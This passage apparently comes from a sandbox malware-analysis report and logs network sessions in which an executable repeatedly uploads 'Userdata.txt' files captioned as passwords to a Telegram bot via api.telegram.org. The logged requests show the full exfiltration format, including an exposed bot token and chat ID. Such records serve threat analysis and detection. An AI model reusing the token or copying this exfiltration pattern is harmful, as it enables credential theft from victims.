2025-01-10 20:54:27 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44757,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542467,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50042	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:28 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd34142e1138ab Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:28 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 31 34 32 65 31 31 33 38 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd34142e1138abContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:28 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:28 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:28 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44758,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542468,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50044	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:30 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3433fc6c9df6 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:30 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 33 33 66 63 36 63 39 64 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3433fc6c9df6Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:30 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:30 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44759,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542470,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50046	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:32 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3458c368198e Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:32 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 35 38 63 33 36 38 31 39 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3458c368198eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:32 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:32 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:32 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44760,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542472,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50048	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:34 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3484fdb0dcfa Host: api.telegram.org Content-Length: 1090
2025-01-10 20:54:34 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 38 34 66 64 62 30 64 63 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3484fdb0dcfaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:34 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:34 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:34 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44761,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542474,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50050	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:35 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd34afcee2471b Host: api.telegram.org Content-Length: 1090
2025-01-10 20:54:35 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 61 66 63 65 65 32 34 37 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd34afcee2471bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:36 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:36 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:36 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44762,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542476,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50052	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:37 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd34dbbdda11f8 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:37 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 64 62 62 64 64 61 31 31 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd34dbbdda11f8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:37 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:37 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:37 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44763,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542477,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50054	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:39 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd35154a777d2a Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:39 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 31 35 34 61 37 37 37 64 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd35154a777d2aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:39 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:39 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:39 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44764,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542479,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50056	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:40 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd354d6985ff47 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
